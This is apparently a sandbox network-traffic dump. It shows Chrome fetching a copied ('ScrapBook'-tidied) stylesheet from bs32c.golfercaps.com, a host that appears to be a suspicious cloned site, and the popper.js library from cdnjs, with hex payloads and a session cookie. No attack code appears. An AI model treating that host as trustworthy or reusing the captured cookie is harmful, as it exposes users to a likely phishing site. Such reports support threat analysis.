                                                                  2024-12-30 21:42:33 UTC491INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 75 6c 2e 6d 65 6e 75 2c 20 75 6c 2e 6d 65 6e 75 20 75 6c 20 7b 20 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 6e 6f 6e 65 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 75 6c 2e 6d 65 6e 75 20 6c 69 20 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7d 0a 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 2c 20 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 44 69 76 20 7b 20 66 6c 6f 61
                                                                  Data Ascii: /* Code tidied up by ScrapBook */ul.menu, ul.menu ul { list-style-type: none; float: left; width: 100%; margin: 0px; padding: 0px; background-color: white; }ul.menu li { margin-top: 0px; float: left; width: 100%; }.menuCategory, .menuCategoryDiv { floa
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 72 79 49 63 6f 6e 20 7b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 35 70 78 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 62 6f 72 64 65 72 3a 20 6d 65 64 69 75 6d 20 6e 6f 6e 65 3b 20 77 69 64 74 68 3a 20 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 36 70 78 3b 20 7d 0a 2e 6d 65 6e 75 43 61 74 65 67 6f 72 79 4c 69 6e 6b 41 72 72 6f 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 77 68 69 74 65 5f 61 72 72 6f 77 2e 70 6e 67 22 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 39 35 25 20 63 65 6e 74 65 72 3b 20 7d 0a 2e 68 69 67 68 6c 69 67 68 74 4d 65 6e 75 43 61 74 65 67 6f
                                                                  Data Ascii: ryIcon { padding-right: 5px; vertical-align: middle; border: medium none; width: 20px; height: 16px; }.menuCategoryLinkArrow { background-image: url("white_arrow.png"); background-repeat: no-repeat; background-position: 95% center; }.highlightMenuCatego
                                                                  2024-12-30 21:42:33 UTC755INData Raw: 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 39 35 25 20 63 65 6e 74 65 72 3b 20 7d 0a 2e 61 63 74 69 76 65 4d 65 6e 75 54 6f 6f 6c 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 20 21 20 69 6d 70 6f 72 74 61 6e 74 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 33 35 2c 20 32 33 33 2c 20 32 33 33 29 20 21 20 69 6d 70 6f 72 74 61 6e 74 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 30 70 78 20 73 6f 6c 69 64 20 72 67 62 28 31 35 33 2c 20 31 35 33 2c 20 31 35 33 29 20 21 20 69 6d 70 6f 72 74 61 6e 74 3b 20 70 61 64 64 69 6e 67 2d 6c 65
                                                                  Data Ascii: : no-repeat; background-position: 95% center; }.activeMenuTool { color: rgb(0, 0, 0) ! important; font-size: 10px; background-color: rgb(235, 233, 233) ! important; text-decoration: none; border-left: 10px solid rgb(153, 153, 153) ! important; padding-le


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.458496188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC1364OUTGET /vfd23ced/assets/stdweborder.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:34 UTC876INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:34 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 143174
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Crcp5OlONCklRB8N7OoLzvmU3jcubimil0vA9Denxad%2FDuJc44sUAnPIi3bha6MJBBOtd8wvLDriV95duHAKrB3el3efwQtibk2QH3XNmUOVrfqKGj7el1IWG9J4MHKIK8Cm4v3elA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334f186f236b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1944&rtt_var=769&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1942&delivery_rate=1502057&cwnd=172&unsent_bytes=0&cid=906ec9ea65d19cdb&ts=872&x=0"
                                                                  2024-12-30 21:42:34 UTC493INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 22 62 67 2e 70 6e 67 22 29 20 72 65 70 65 61 74 2d 78 20 73 63 72 6f 6c 6c 20 30 70 78 20 30 70 78 3b 20 7d 0a 54 44 2e 48 45 41 44 41 44 44 52 5f 4d 49 47 52 41 54 49 4f 4e 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 20 62 6f 72
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.backgroundImage { background: transparent url("bg.png") repeat-x scroll 0px 0px; }TD.HEADADDR_MIGRATION { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 10px 5px; text-align: left; bor
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 77 72 61 70 3b 20 7d 0a 54 44 2e 43 48 45 41 44 41 44 44 52 5f 4d 49 47 52 41 54 49 4f 4e 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a 54 44 2e 43 48 45 41 44 41 44 44 52 5f 42 54 4e 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 35
                                                                  Data Ascii: wrap; }TD.CHEADADDR_MIGRATION { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 5px; text-align: center; border-right: 1px solid rgb(255, 255, 255); }TD.CHEADADDR_BTN { text-align: center; border-right: 1px solid rgb(25
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 20 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a 54 44 2e 52 48 45 41 44 41 44 44 52 5f 4d 49 47 52 41 54 49 4f 4e 5f 49 4e 56 4f 49 43 45 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d
                                                                  Data Ascii: ont-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 0px 5px; text-align: center; border-right: 1px solid rgb(255, 255, 255); }TD.RHEADADDR_MIGRATION_INVOICE { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0a 2e 43 41 4c 45 4e 44 41 52 5f 45 44 49 54 42 54 4e 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 74 61 62 6c 65 3b 20 7d 0a 2a 20 68 74 6d 6c 20 2e 43 41 4c 45 4e 44 41 52 5f 45 44 49 54 42 54 4e 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 7d 0a 42 4f 44 59 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 20 6e 6f 6e 65 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 25 20 30
                                                                  Data Ascii: ize: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 5px; text-align: center; }.CALENDAR_EDITBTN { display: inline-table; }* html .CALENDAR_EDITBTN { display: inline; }BODY { background: rgb(255, 255, 255) none repeat scroll 0% 0
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 20 7d 0a 2e 74 53 63 68 65 64 44 65 70 61 72 74 75 72 65 44 61 79 45 76 65 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 32 34 2c 20 32 32 34 2c 20 32 32 34 29 3b 20 7d 0a 2e 74 53 63 68 65 64 44 65 70 61 72 74 75 72 65 44 61 79 4f 64 64 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 30 38 2c 20 32 30 38 2c 20 32 30 38 29 3b 20 7d 0a 6c 61 62 65 6c 2e 45 52 52 4f 52 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 30 2c 20 30 29 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 7d 0a 6c 61 62 65 6c 2e 64 69 73 61 62 6c 65 64 2c 20 2e 75 73 65 72 50 72 6f 70 2e 64 69 73 61 62 6c 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 72
                                                                  Data Ascii: }.tSchedDepartureDayEven { background-color: rgb(224, 224, 224); }.tSchedDepartureDayOdd { background-color: rgb(208, 208, 208); }label.ERROR { display: block; color: rgb(255, 0, 0); white-space: nowrap; }label.disabled, .userProp.disabled { color: r
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 72 64 61 6e 61 2c 41 72 69 61 6c 2c 47 65 6e 65 76 61 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 7d 0a 54 41 42 4c 45 2e 48 45 41 44 41 44 44 52 20 7b 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 54 48 2e 48 45 41 44 41 44 44 52 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c
                                                                  Data Ascii: rdana,Arial,Geneva,Helvetica,sans-serif; font-size: 10px; }TABLE.HEADADDR { margin: 5px; vertical-align: top; font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; }TH.HEADADDR { font-size: 10px; font-family: Verdana,Helvetica,Lucida,
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0a 54 44 2e 43 48 45 41 44 41 44 44 52 5f 4e 4f 57 52 41 50 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 7d 0a 54 44 2e 48 45 41 44 41 44 44 52 43 52 4f 53 53 45 44 20 7b 20 66 6f 6e 74 2d 73
                                                                  Data Ascii: dana,Helvetica,Lucida,Arial,sans-serif; padding: 0px; text-align: center; }TD.CHEADADDR_NOWRAP { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 0px; text-align: center; white-space: nowrap; }TD.HEADADDRCROSSED { font-s
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 20 7d 0a 54 44 2e 48 45 41 44 41 44 44 52 44 45 46 5f 4e 4f 57 52 41 50 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 7d 0a 54 44 2e 50
                                                                  Data Ascii: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 0px; text-align: right; }TD.HEADADDRDEF_NOWRAP { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 0px; text-align: right; white-space: nowrap; }TD.P
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 0a 2e 74 61 62 43 6f 6e 74 65 6e 74 20 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 36 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 7d 0a 2e 74 62 6c 63 6f 6e 74 65 6e 74 77 62 52 69 67 68 74 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 47 65 6e 65 76 61 2c 68 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 20 7d 0a 2e 74 62 6c 63 6f 6e 74 65 6e 74 77 62 53 75 62 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65
                                                                  Data Ascii: .tabContent { margin-bottom: 6px; margin-top: 6px; font-size: 12px; white-space: nowrap; }.tblcontentwbRight { font-family: Verdana,Arial,Geneva,helvetica,sans-serif; margin: 10px; font-size: 14px; text-align: right; }.tblcontentwbSub { font-family: Ve
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 20 70 61 64 64 69 6e 67 3a 20 32 70 78 20 30 70 78 20 30 70 78 3b 20 7d 0a 54 44 2e 55 53 45 52 53 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 32 70 78 20 30 70 78 20 30 70 78 3b 20 7d 0a 54 44 2e 48 45 41 44 41 44 44 52 44 45 46 5f 4c 45 46 54 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 48 65 6c 76 65 74 69 63 61 2c 4c 75 63 69 64 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67
                                                                  Data Ascii: padding: 2px 0px 0px; }TD.USERS { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 2px 0px 0px; }TD.HEADADDRDEF_LEFT { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 0px; vertical-alig


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.458497104.17.25.14443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:34 UTC966INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:34 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"5eb03fa9-4af4"
                                                                  Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: HIT
                                                                  Age: 376496
                                                                  Expires: Sat, 20 Dec 2025 21:42:34 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnR3B4XMtGL0yDYucUQOafvB0GkFmbSB32gabR%2FuqNMHTD1kukWOyOn99%2BQJQNPVHcfSQbagYnd09G%2B%2FcXxtwiW3xu6zFm0VDHPRsUS8%2BCMciuemCsVjlDj%2BE%2B1U44bJGy3tkQVz"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533516f4632d3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:34 UTC403INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                  Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f
                                                                  Data Ascii: if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#do
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65
